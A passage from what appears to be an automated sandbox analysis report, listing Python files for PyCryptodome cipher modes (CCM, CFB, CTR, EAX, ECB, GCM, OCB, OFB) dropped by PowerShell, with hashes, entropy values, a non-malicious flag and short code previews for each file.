                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1647
                                                                                                                                                                                                                      Entropy (8bit):4.397477650476907
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1RM7CnbKT3fAbSUA9UUOHMnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:cuuvUXUO8vesLeJLn8nlEF49
                                                                                                                                                                                                                      MD5:91133F991531450E28EE3F680FBF6F20
                                                                                                                                                                                                                      SHA1:BB3761FBD4A0F912A77258D73B30D7E43403130E
                                                                                                                                                                                                                      SHA-256:5F0058DE990A9668E5B0CE2273E74E0D5BFDF79F5E6745DC9B8FAEB39822A9AD
                                                                                                                                                                                                                      SHA-512:F5FAF2155B4D172D3DDAF556DF2EF28E5CE93CE81F471AED1D7215C658EF03C9DAB71FA3BDABD3133951A1A64EA628587F8390D330280518B2CA60F0E6451D74
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from types import ModuleType..from typing import Union, overload, Dict, Tuple, Optional....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CcmMode']....class CcmMode(object):.. block_size: int.. nonce: bytes.... def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. msg_len: int,.. assoc_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> CcmMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str:
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):11034
                                                                                                                                                                                                                      Entropy (8bit):4.521727406108344
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:dSMFQHvo5i4mILXEwOOscx2JL5qwG47W9ytU4p2EVQ57T1qytU4eputAVQqWFZb0:dSCQHvSyOH2JLcOq+U46kYU4o7KZDmJ
                                                                                                                                                                                                                      MD5:732AFC2DA4808607732C573DA61C1303
                                                                                                                                                                                                                      SHA1:0BF7AC4B48B997D003F1B5968A0DEC744D7D8564
                                                                                                                                                                                                                      SHA-256:56B7966054D1D7353546FA480BC0BB11A70E1BF01E909568CB00DC994CE30058
                                                                                                                                                                                                                      SHA-512:BA9440E5C1DEF9D224AC34FFB6C118AA729F488101247E8AE94C7E8870347AED3846BE225B38C32B0FFFB1AAD912AE3D24A8B88DE1516752236FE4711F2B274B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# Cipher/mode_cfb.py : CFB mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):757
                                                                                                                                                                                                                      Entropy (8bit):4.692214100146291
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:1REYBw1k1Jal9lvIY3FDDHo2YRyU1AOlsQRZFq6R5pFq6jI33ynFq6R5xnFq6jIF:1REPZjT3lGNAYsEHnRNne3yFnR3Fne3l
                                                                                                                                                                                                                      MD5:C277ABB0D41936FA2B2C6C5A7555C9B2
                                                                                                                                                                                                                      SHA1:87B8E4314BBB63E156CB1E2DB3BBE318B7B13803
                                                                                                                                                                                                                      SHA-256:15EE428028300FCB807AF557DB278F229C260EC98E8AE1971661B436CFE5C2A9
                                                                                                                                                                                                                      SHA-512:1D2BF9AE0D89776EE0D2622A520C6FA0590C5B900419502F55679AEEEF2D53DF468894DB87867AD9596E79D6E4CB04D3CCCA3F31B25D62CEB4222B92DBC544F1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, overload....from Cryptodome.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CfbMode']......class CfbMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.. .. def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer,.. segment_size: int) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):16245
                                                                                                                                                                                                                      Entropy (8bit):4.424470034057399
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:d5QHvCtxqH2LakMiITNEriO+gU46o2U4ozCgShWWwBil3iYelIisiSSZD:DeIF7AYT6o2TozrShGaSnlL
                                                                                                                                                                                                                      MD5:6CC48CA12550FD08577DA1995C8995DC
                                                                                                                                                                                                                      SHA1:73A09E90D9F7517023509F36AB5A4613051E27AA
                                                                                                                                                                                                                      SHA-256:1E47456421A1073CE1298AFBAF9E2FF228A7164D842C66AD75C96DB4C9D2ED77
                                                                                                                                                                                                                      SHA-512:BA2F15BD85A01C8134D46E99422954B3205D570957CFE6ECB2BC6BCD4E6D394FB73D1F2B604E44AE25D2C88A9A64005CBDFC46DC0DE77270FF392F4A7B7F01ED
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# Cipher/mode_ctr.py : CTR mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):831
                                                                                                                                                                                                                      Entropy (8bit):4.595725224881154
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1REPZjT3Q6fUAY4AVjjnRNne3yFnR3Fne38:YVLcZVjTvesLeM
                                                                                                                                                                                                                      MD5:22DC24EE5319AB0ACF3D1AEFEE2854C5
                                                                                                                                                                                                                      SHA1:91E1F26CE9FDA76A71AC3D761AAD3DFA1BA64996
                                                                                                                                                                                                                      SHA-256:AB8697E3CDA28729D9CB6A6545EA1E3FCDC184C9E07BFB70D9FAEE38F27012EF
                                                                                                                                                                                                                      SHA-512:3E4DAC2C8C87A11C783DAAC9F678B2A50220857636BDB7A9B1D23DF9F8421A9DC8BF63CF6FB6BD1EB4561615E712F19EC932180D0BC398F7AB7F2E5CD62BD32F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, overload....from Cryptodome.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CtrMode']....class CtrMode(object):.. block_size: int.. nonce: bytes.... def __init__(self,.. block_cipher: SmartPointer,.. initial_counter_block: Buffer,.. prefix_len: int,.. counter_len: int,.. little_endian: bool) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):14893
                                                                                                                                                                                                                      Entropy (8bit):4.675503892468894
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:9qrskrs9t3q/InLwPVpgaMYO4SU4sU4pzzRWPvguXNYPR:0rskrs9VqOwk4STsTpz1WHgw6
                                                                                                                                                                                                                      MD5:F46B49721DEB8AE5C96A80DE5B4EC503
                                                                                                                                                                                                                      SHA1:87D6C7F87868C9F6DBEAB694BC16E5EDA2E52A32
                                                                                                                                                                                                                      SHA-256:4F4F61208DAB1A58BA3A03E70DE3B9E31E5274D132BEA3692FAACB0E736404DC
                                                                                                                                                                                                                      SHA-512:E3301F7BFC6D21EE359726EC7DC5197784DC603F683BDA9A8133BC0809AFC2EC81DAC7F1F9B9E2DBD550AEA392B81D4DC866FF93609EC84DA41015598E553DE5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1590
                                                                                                                                                                                                                      Entropy (8bit):4.436811038410909
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1RM7C/DsT3VEA9UbnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:c+AGXrvesLeJLn8nlEF49
                                                                                                                                                                                                                      MD5:B414CB43B46387AD1B1B2AD15F66314E
                                                                                                                                                                                                                      SHA1:DE8BFF4EE379D1F4A7DF3EC4051A3CB1D3DCB09E
                                                                                                                                                                                                                      SHA-256:C5246506D2FF0E2B13BAE3A5D47467C47994932C24499FEFCF32126C39BF9611
                                                                                                                                                                                                                      SHA-512:0788A2CF03A23CD2788A592E5C201F2632CABEF44B9094158A7B5A02B0AB97202C05562FD78F585554E7A4FEA2C862B885F3E5074792080285787F112CCB5F22
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from types import ModuleType..from typing import Any, Union, Tuple, Dict, overload, Optional....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['EaxMode']....class EaxMode(object):.. block_size: int.. nonce: bytes.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> EaxMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> No
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8541
                                                                                                                                                                                                                      Entropy (8bit):4.500745119245566
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:dBFQHvoWnpqW8XSXMxJYuwG2m0/EfQb7nk+qIbpktAV7+qWKWJRI:dfQHv1z8XjJYuwVkZi7Z1WJRI
                                                                                                                                                                                                                      MD5:6CBC08E85C2F37D641BE890F91B0C1F3
                                                                                                                                                                                                                      SHA1:54525C6CFB8431F5249FDDDE29B1CC27107F1D68
                                                                                                                                                                                                                      SHA-256:D0A75E9CC56230E1C044411A1A6760FF7678D449E1263AEFFEF7E2752E360FF8
                                                                                                                                                                                                                      SHA-512:89E08B33A85FDDFA417CD6D3BF7C1BBEC94F280C5D2DD43AE82D9A12C4CC25A9057B0E87F50FF27F1491C18C754AEFA7DAA190EEB0EDD3BACCBCFD6A5ABE0A96
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# Cipher/mode_ecb.py : ECB mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):615
                                                                                                                                                                                                                      Entropy (8bit):4.8565980350251685
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:1REYBw1k1Jal9lvIY3FDlD1AZlUFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REPZjT3PJAbCnRNne3yFnR3Fne38
                                                                                                                                                                                                                      MD5:125B8830D549BBC165F15871922DE5E5
                                                                                                                                                                                                                      SHA1:183D164CB3135E0DD3A27F91D20EB39DD01B2B64
                                                                                                                                                                                                                      SHA-256:8A8A5ED79EFAFC9CB7A3AD95BAE1ABCAA4E447776760778E91FDD6E510714352
                                                                                                                                                                                                                      SHA-512:F7B871B62D73B4AE40E3FD6FD65C8078F10464D9976E9760CC7B34541A1DFF43548DA0B31B47BA5A55C50033B0D5DE6D3549C594E2792D036907949CA6DF0C5B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, overload....from Cryptodome.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = [ 'EcbMode' ]....class EcbMode(object):.. def __init__(self, block_cipher: SmartPointer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):21961
                                                                                                                                                                                                                      Entropy (8bit):4.722955510499751
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:0rskrs9Vqjk6xv931hir4YTTTrTXWMfDR/:0r6qjj3qr5W4/
                                                                                                                                                                                                                      MD5:C82F2145CE418812E8C878FED362D392
                                                                                                                                                                                                                      SHA1:2157FBA32079726D8A5AF845D68CFF9A9415D017
                                                                                                                                                                                                                      SHA-256:8899DCAE0739C3E5C87470B6A4A0552EDDCFAE3DF957AE497BF36DC27D036B62
                                                                                                                                                                                                                      SHA-512:BB911A617527391180E2EEA19EF1D4F310F2C05116D64D137C51F7E599BC5A554E6E8EE2FD7F7527F1D97B862980B1AE1B262168DD196F74846F8B9BB54F306B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1586
                                                                                                                                                                                                                      Entropy (8bit):4.431900531457141
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1RM7ClDOT3zRA9UCLnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:cSuVXQvesLeJLn8nlEF49
                                                                                                                                                                                                                      MD5:7D3D576FC1628D95451DC9436EC64091
                                                                                                                                                                                                                      SHA1:742B2C357FF613BC5D5285211D3D52AA4BD6F445
                                                                                                                                                                                                                      SHA-256:49B6A847D2C71DA556387D1987946EDD0C259CCF3952C63C9D1061CB4EB731FE
                                                                                                                                                                                                                      SHA-512:8781937E2570F5FE246F0349A41CC3406E40156F9FDEC08701983DB091DA06637B6CD428D109A57F40B61F3D72DA825F69ABA1BC0F1DFA3D9660A21E88DFFA74
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from types import ModuleType..from typing import Union, Tuple, Dict, overload, Optional....__all__ = ['GcmMode']....Buffer = Union[bytes, bytearray, memoryview]....class GcmMode(object):.. block_size: int.. nonce: Buffer.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> GcmMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None:
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20511
                                                                                                                                                                                                                      Entropy (8bit):4.486050917892721
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:9qrskrs9t3q/IRqz86shyyJHDrlKXhf5dOvbY40S/SHfp+afbRewJse9q/bqO5fa:0rskrs9VqQqIohhd6Y4OLe8seyZ5fhp2
                                                                                                                                                                                                                      MD5:E43E20E3F39C03CEAFE713463C2C36A9
                                                                                                                                                                                                                      SHA1:33EE5A2D21CB2DCC6F5F600AF151F21207C50DD8
                                                                                                                                                                                                                      SHA-256:3263550C7ADE01E3088BC5773101C9D8F6B24628916EBC58CE763F3029D9D9FA
                                                                                                                                                                                                                      SHA-512:9B48FE7329A36B628DEC3BAB36A673F9398814DFDBD6B1344AC8E2AA41B1EF3D2A3492AC4AFF9ED9D7F0E9A970B0956F31CC63698F3B0A3DF4CFA5C32AA2E0FA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1267
                                                                                                                                                                                                                      Entropy (8bit):4.510576229003074
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1RM7CRDQlT30xA949nRNne3yFnR3Fne3UPtWYn90E+5Q:ccQlARNvesLeJYnaEv
                                                                                                                                                                                                                      MD5:76916331AA1417BD4EADDD10948D8D26
                                                                                                                                                                                                                      SHA1:1223CEC2D805BE11A585A842EDA6B0214F1AB3E3
                                                                                                                                                                                                                      SHA-256:E0C136E3762DD93C24793DAF989D94061AF30A300D7308BC8AD2EF69E73A92E5
                                                                                                                                                                                                                      SHA-512:BABD83C1F0D4399B0B2FB099B8303303694763104B75C56C64CAD8C0A722B7F3FEE5FA0EA11026857E5822853D73905B45AA83EF4DAC23D8DD56A6EF41C73621
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from types import ModuleType..from typing import Union, Any, Optional, Tuple, Dict, overload....Buffer = Union[bytes, bytearray, memoryview]....class OcbMode(object):.. block_size: int.. nonce: Buffer.... def __init__(self,.. factory: ModuleType,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> OcbMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None:
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):10511
                                                                                                                                                                                                                      Entropy (8bit):4.49013114589532
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:dLFQHvoPoxi4mILd52ALFxKiDqwG4rW9ytU4p2EVQ577BqotU4SputAVsqW1vYhH:d5QHv/XwADKKqO6+U46Q2U4c3avgQO
                                                                                                                                                                                                                      MD5:D68B4824ACBEA8EBF1EAB4F82138CF3E
                                                                                                                                                                                                                      SHA1:FB8364761301477406B8301FA045B0630CFCBD85
                                                                                                                                                                                                                      SHA-256:A86D0ACFABADF852EF126484A267A6C3953AF68FD17E6FCE496C4D2DFC9BCFE7
                                                                                                                                                                                                                      SHA-512:62EA09E54240F0E7D6296B397044B8D7ACDFD7578BAE2E0C2A3F4E6AC400CA949BA772EFD969FFBB7820CBCE6D4EA1B5E4934526B2BA7DA5655576109CFCE10F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# Cipher/mode_ofb.py : OFB mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):720
                                                                                                                                                                                                                      Entropy (8bit):4.737448172448685
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:1REYBw1k1Jal9lvIY3FDXHo2JRyU1AOlSFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REPZjT3pHo2NAY4nRNne3yFnR3Fne38
                                                                                                                                                                                                                      MD5:8E7443C03B74A4BB74BBBCF7A93282A7
                                                                                                                                                                                                                      SHA1:7A9C908B9D698278E5561A45A024C8DDF53CF304
                                                                                                                                                                                                                      SHA-256:D1B1A685ABE48604348DA3AE3C54BAF54ED0BD5CC9F0CB93867A82F8877F9ECF
